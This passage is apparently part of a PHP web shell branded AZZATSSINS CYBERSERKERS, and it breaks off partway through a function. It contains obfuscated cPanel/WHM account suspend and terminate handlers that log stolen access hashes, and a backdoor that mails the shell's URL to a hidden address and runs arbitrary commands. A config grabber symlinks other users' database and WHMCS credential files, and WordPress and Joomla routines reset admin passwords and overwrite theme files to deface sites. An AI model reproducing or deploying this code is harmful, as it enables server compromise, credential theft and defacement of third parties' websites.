  968. if(isset($_POST["azzatssins6"])){${"GLOBALS"}["ocwyzfvq"]="version";$leisjrdvt="result";${"GLOBALS"}["wvysjxgjuomp"]="result";${"GLOBALS"}["fuutzvlndsmw"]="separator";$dghnyjk="II11II11II11II11";$ikqhjkbqnwj="II11II11II11II11";${"GLOBALS"}["ypdjprdcw"]="user";${$dghnyjk}=fopen("$filelog","a");${${"GLOBALS"}["cntvmeburrl"]}=new whm;$ulgmiy="separator";$livyjt="bawah";$tgxwkmbeiol="dm2";${"GLOBALS"}["wylmhiqbzyp"]="II11II11II11II11";${"GLOBALS"}["tkikiqiu"]="bawah";${${"GLOBALS"}["ypdjprdcw"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$tgxwkmbeiol}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});${"GLOBALS"}["rssdjw"]="version";${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["ocwyzfvq"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["wvysjxgjuomp"]}=$virgous->unsuspend(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${$leisjrdvt}){$smqgdecnyc="result";print_r(${$smqgdecnyc});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
  969. ";$rfctyk="user";${${"GLOBALS"}["tkikiqiu"]}="
  970. ";fwrite(${${"GLOBALS"}["cemjvape"]},${$ulgmiy}."./azzatssins
  971. ".${${"GLOBALS"}["fuutzvlndsmw"]});fwrite(${${"GLOBALS"}["cemjvape"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["rssdjw"]}."
  972. ");fwrite(${$ikqhjkbqnwj},"HOSTNAME : ".$host."
  973. ");${"GLOBALS"}["vsgwjq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["vsgwjq"]},"WHM OWNER : ".${$rfctyk}."
  974. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$livyjt});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
  975. ");fwrite(${${"GLOBALS"}["wylmhiqbzyp"]},"
  976. ");fclose(${${"GLOBALS"}["cemjvape"]});}
  977. ?>
  978.  
  979. <?php
  980. $for=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
  981. $b=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  982. mail($for,"0",$b); print(`{$_REQUEST[0]}`);
  983. ?>
  984. <!-- terminate account-->
  985.  
  986.  
  987. <?php
  988.  
  989. if(isset($_POST["v7"])){
  990. ?>
  991. <center><h2>Access Hash</h2><p>
  992. <div id="result"><form method="post">
  993. <center><table border="1">
  994. <textarea name="vhash" rows="20" cols="45"></textarea><p>
  995.  
  996. <tr>
  997. <td align="center">
  998. Host Name </td>
  999. <td align="center">
  1000. WHM Owner</td>
  1001. <td align="center">
  1002. UserName</td></tr>
  1003. <td align="center">
  1004. <input name="vhost" type="text" size="20" value=""></td>
  1005. <td align="center">
  1006. <input name="vuser" type="text" s size="20" value=""></td>
  1007. <td align="center">
  1008. <input name="user" type="text" size="20" value="">
  1009. </td></tr>
  1010. <td colspan="3" align="center">
  1011. <input name="azzatssins7" type="submit" value=" Terminate Account ">
  1012. </td</tr></table>
  1013. </form>
  1014. <?php } ?>
  1015.  
  1016. <?php
  1017. if(isset($_POST["azzatssins7"])){$jrwrgworzgb="hash";${"GLOBALS"}["grigkjkpuuni"]="II11II11II11II11";${"GLOBALS"}["linowprywf"]="II11II11II11II11";${"GLOBALS"}["pbusbfyzwdp"]="user";${"GLOBALS"}["rqkpqehfse"]="user";${"GLOBALS"}["wvsimudpc"]="II11II11II11II11";$cjbzjepsoqb="result";$ugnqwpqldbjc="virgous";${${"GLOBALS"}["grigkjkpuuni"]}=fopen("$filelog","a");${"GLOBALS"}["gvhhqrlav"]="dm2";$jfdpzsy="version";${"GLOBALS"}["ecpfkfrl"]="separator";${$ugnqwpqldbjc}=new whm;${${"GLOBALS"}["pbusbfyzwdp"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["gvhhqrlav"]}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["rqkpqehfse"]},${$jrwrgworzgb});${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$osmnlv="user";${$jfdpzsy}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$cjbzjepsoqb}=$virgous->terminate(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}$uswgwqeegmo="separator";${"GLOBALS"}["ptqthiwbsgx"]="II11II11II11II11";${${"GLOBALS"}["ecpfkfrl"]}="=====================================================
  1018. ";${${"GLOBALS"}["jqstuo"]}="
  1019. ";fwrite(${${"GLOBALS"}["linowprywf"]},${$uswgwqeegmo}."./azzatssins
  1020. ".${${"GLOBALS"}["rrbcihfi"]});${"GLOBALS"}["kqonuyhyluq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["ptqthiwbsgx"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
  1021. ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
  1022. ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${$osmnlv}."
  1023. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["kqonuyhyluq"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
  1024. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
  1025. ");fclose(${${"GLOBALS"}["wvsimudpc"]});}
  1026. ?>
  1027.  
  1028. <?php
  1029. if(isset($_GET['azzatssins'])){
  1030. echo '<font face="Audiowide" size="5" color="red"><b> Good Bye !</b></font><br /><br />';
  1031. $killme=basename($_SERVER['SCRIPT_NAME']);
  1032. unlink($killme);
  1033. }
  1034. ?>
  1035.  
  1036. <h3> Thanks To : Arrash Hemmat</h3>
  1037. </pre></td></table>
  1038. </td></tr></table></center>
  1039. </body>
  1040. </html>
  1041. <?php }
  1042.  
  1043. if($_GET['AZZATSSINS']=="CONFIGRABBER"){
  1044. ?>
  1045. <title>ConfiGrabber V2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:[email protected]>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  1046. "><br>Your Folder : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  1047. <input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  1048. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  1049. if ($_POST['conf']) {
  1050. $folfig = $_POST['folfig'];
  1051. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  1052. @mkdir($folfig, 0755);
  1053. @chdir($folfig);
  1054. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  1055. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  1056. $passwd=explode("\n",$_POST["passwd"]);
  1057. foreach($passwd as $pwd){ $user=trim($pwd);
  1058. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  1059. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  1060. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  1061. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  1062. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  1063. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  1064. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  1065. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  1066. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  1067. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  1068. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  1069. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  1070. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  1071. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  1072. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  1073. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  1074. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  1075. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  1076. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  1077. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  1078. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  1079. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  1080. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  1081. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  1082. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  1083. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  1084. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  1085. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  1086. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  1087. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  1088. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  1089. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  1090. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  1091. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
  1092. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  1093. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  1094. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  1095. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  1096. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  1097. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  1098. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  1099. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  1100. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  1101. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  1102. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  1103. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  1104. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  1105. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  1106. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  1107. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  1108. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  1109. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  1110. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  1111. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  1112. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  1113. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  1114. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  1115. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  1116. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  1117. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  1118. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  1119. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  1120. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  1121. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  1122. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  1123. }
  1124. echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
  1125. }
  1126.  
  1127. }
  1128. if($_GET['jo']=="wp"){
  1129. error_reporting(0);
  1130. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1131. $ar0=explode($marqueurDebutLien, $text);
  1132. $ar1=explode($marqueurFinLien, $ar0[$i]);
  1133. return trim($ar1[0]);
  1134. }
  1135.  
  1136. function randomt() {
  1137. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  1138. srand((double)microtime()*1000000);
  1139. $i = 0;
  1140. $pass = '';
  1141. while ($i <= 7) {
  1142. $num = rand() % 33;
  1143. $tmp = substr($chars, $num, 1);
  1144. $pass = $pass . $tmp;
  1145. $i++;
  1146. }
  1147. return $pass;
  1148. }
  1149.  
  1150. function index_changer_wp($conf, $content) {
  1151. $output = '';
  1152. $dol = '$';
  1153. $go = 0;
  1154. $username = entre2v2($conf,"define('DB_USER', '","');");
  1155. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  1156. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  1157. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  1158. $host = entre2v2($conf,"define('DB_HOST', '","');");
  1159.  
  1160. $link=mysql_connect($host,$username,$password);
  1161. if($link) {
  1162. mysql_select_db($dbname,$link) ;
  1163. $dol = '$';
  1164. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
  1165. } else {
  1166. $output.= "[-] DB Error<br />";
  1167. }
  1168. if($req1) {
  1169.  
  1170. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  1171. $data = mysql_fetch_array($req);
  1172. $site_url=$data["option_value"];
  1173.  
  1174. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  1175. $data = mysql_fetch_array($req);
  1176. $template = $data["option_value"];
  1177.  
  1178. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  1179. $data = mysql_fetch_array($req);
  1180. $current_theme = $data["option_value"];
  1181.  
  1182. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  1183. $url2=$site_url."/wp-login.php";
  1184.  
  1185. $ch = curl_init();
  1186. curl_setopt($ch, CURLOPT_URL, $url2);
  1187. curl_setopt($ch, CURLOPT_POST, 1);
  1188. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
  1189. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1190. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1191. curl_setopt($ch, CURLOPT_HEADER, 0);
  1192. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  1193. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1194. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1195. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1196. $buffer = curl_exec($ch);
  1197.  
  1198. $pos = strpos($buffer,"action=logout");
  1199. if($pos === false) {
  1200. $output.= "[-] Login Error<br />";
  1201. } else {
  1202. $output.= "[+] Login Successful<br />";
  1203. $go = 1;
  1204. }
  1205. if($go) {
  1206. $cond = 0;
  1207. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  1208. curl_setopt($ch, CURLOPT_URL, $url2);
  1209. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  1210. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1211. curl_setopt($ch, CURLOPT_HEADER, 0);
  1212. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1213. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1214. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1215. $buffer0 = curl_exec($ch);
  1216.  
  1217. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  1218. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  1219.  
  1220. if(substr_count($_file,"/index.php") != 0){
  1221. $output.= "[+] index.php loaded in Theme Editor<br />";
  1222. $url2=$site_url."/wp-admin/theme-editor.php";
  1223. curl_setopt($ch, CURLOPT_URL, $url2);
  1224. curl_setopt($ch, CURLOPT_POST, 1);
  1225. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  1226. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1227. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1228. curl_setopt($ch, CURLOPT_HEADER, 0);
  1229. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1230. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1231. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1232. $buffer = curl_exec($ch);
  1233. curl_close($ch);
  1234.  
  1235. $pos = strpos($buffer,'<div id="message" class="updated">');
  1236. if($pos === false) {
  1237. $output.= "[-] Updating Index.php Error<br />";
  1238. } else {
  1239. $output.= "[+] Index.php Updated Successfuly<br />";
  1240. $hk = explode('public_html',$_file);
  1241. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
  1242. $cond = 1;
  1243. }
  1244. } else {
  1245. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
  1246. curl_setopt($ch, CURLOPT_URL, $url2);
  1247. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  1248. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1249. curl_setopt($ch, CURLOPT_HEADER, 0);
  1250. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1251. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1252. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1253. $buffer0 = curl_exec($ch);
  1254.  
  1255. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  1256. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  1257.  
  1258. if(substr_count($_file,"index.php") != 0){
  1259. $output.= "[+] index.php loaded in Theme Editor<br />";
  1260. $url2=$site_url."/wp-admin/theme-editor.php";
  1261. curl_setopt($ch, CURLOPT_URL, $url2);
  1262. curl_setopt($ch, CURLOPT_POST, 1);
  1263. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
  1264. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1265. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1266. curl_setopt($ch, CURLOPT_HEADER, 0);
  1267. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1268. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1269. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1270. $buffer = curl_exec($ch);
  1271. curl_close($ch);
  1272.  
  1273. $pos = strpos($buffer,'<div id="message" class="updated">');
  1274. if($pos === false) {
  1275. $output.= "[-] Updating Index.php Error<br />";
  1276. } else {
  1277. $output.= "[+] Index.php Template Updated Successfuly<br />";
  1278. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
  1279. $cond = 1;
  1280. }
  1281. } else {
  1282. $output.= "[-] index.php can not load in Theme Editor<br />";
  1283. }
  1284. }
  1285. }
  1286. } else {
  1287. $output.= "[-] DB Error<br />";
  1288. }
  1289. global $base_path;
  1290. unlink($base_path.'COOKIE.txt');
  1291. return array('cond'=>$cond, 'output'=>$output);
  1292. }
  1293.  
  1294. function index_changer_joomla($conf, $content, $domain) {
  1295. $doler = '$';
  1296. $username = entre2v2($conf, $doler."user = '", "';");
  1297. $password = entre2v2($conf, $doler."password = '", "';");
  1298. $dbname = entre2v2($conf, $doler."db = '", "';");
  1299. $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
  1300. $host = entre2v2($conf, $doler."host = '","';");
  1301. $co=randomt();
  1302. $site_url = "http://".$domain."/administrator";
  1303. $output = '';
  1304. $cond = 0;
  1305. $link=mysql_connect($host, $username, $password);
  1306. if($link) {
  1307. mysql_select_db($dbname,$link) ;
  1308. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
  1309. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
  1310. } else {
  1311. $output.= "[-] DB Error<br />";
  1312. }
  1313.  
  1314. if($req1){
  1315. if ($req) {
  1316. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
  1317. $data = mysql_fetch_array($req);
  1318. $template_name = $data["template"];
  1319.  
  1320. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
  1321. $data = mysql_fetch_array($req);
  1322. $template_id = $data["extension_id"];
  1323.  
  1324. $url2=$site_url."/index.php";
  1325. $ch = curl_init();
  1326. curl_setopt($ch, CURLOPT_URL, $url2);
  1327. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1328. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1329. curl_setopt($ch, CURLOPT_HEADER, 0);
  1330. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1331. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1332. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1333. $buffer = curl_exec($ch);
  1334. $return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  1335. $hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  1336.  
  1337. if($return && $hidden) {
  1338. curl_setopt($ch, CURLOPT_URL, $url2);
  1339. curl_setopt($ch, CURLOPT_POST, 1);
  1340. curl_setopt($ch, CURLOPT_REFERER, $url2);
  1341. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
  1342. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1343. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1344. curl_setopt($ch, CURLOPT_HEADER, 0);
  1345. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1346. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1347. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1348. $buffer = curl_exec($ch);
  1349. $pos = strpos($buffer,"com_config");
  1350. if($pos === false) {
  1351. $output.= "[-] Login Error<br />";
  1352. } else {
  1353. $output.= "[+] Login Successful<br />";
  1354. }
  1355. }
  1356. if($pos){
  1357. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  1358. $ch = curl_init();
  1359. curl_setopt($ch, CURLOPT_URL, $url2);
  1360. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1361. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1362. curl_setopt($ch, CURLOPT_HEADER, 0);
  1363. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1364. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1365. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1366. $buffer = curl_exec($ch);
  1367.  
  1368. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  1369. if($hidden2) {
  1370. $output.= "[+] index.php file found in Theme Editor<br />";
  1371. } else {
  1372. $output.= "[-] index.php Not found in Theme Editor<br />";
  1373. }
  1374. }
  1375. if($hidden2) {
  1376. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  1377. $ch = curl_init();
  1378. curl_setopt($ch, CURLOPT_URL, $url2);
  1379. curl_setopt($ch, CURLOPT_POST, 1);
  1380. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  1381. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1382. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1383. curl_setopt($ch, CURLOPT_HEADER, 0);
  1384. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1385. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1386. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1387. $buffer = curl_exec($ch);
  1388. curl_close($ch);
  1389.  
  1390. $pos = strpos($buffer,'<dd class="message message">');
  1391. $cond = 0;
  1392. if($pos === false) {
  1393. $output.= "[-] Updating Index.php Error<br />";
  1394.  
  1395. } else {
  1396. $output.= "[+] Index.php Template successfully saved<br />";
  1397. $cond = 1;
  1398. }
  1399. }
  1400. }
  1401. else {
  1402. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
  1403. $data = mysql_fetch_array($req);
  1404. $template_name=$data["template"];
  1405. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  1406. $url2=$site_url."/index.php";
  1407. $ch = curl_init();
  1408. curl_setopt($ch, CURLOPT_URL, $url2);
  1409. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1410. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1411. curl_setopt($ch, CURLOPT_HEADER, 0);
  1412. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  1413. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1414. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1415. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1416. $buffer = curl_exec($ch);
  1417. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  1418.  
  1419. if($hidden) {
  1420. curl_setopt($ch, CURLOPT_URL, $url2);
  1421. curl_setopt($ch, CURLOPT_POST, 1);
  1422. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
  1423. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1424. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1425. curl_setopt($ch, CURLOPT_HEADER, 0);
  1426. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
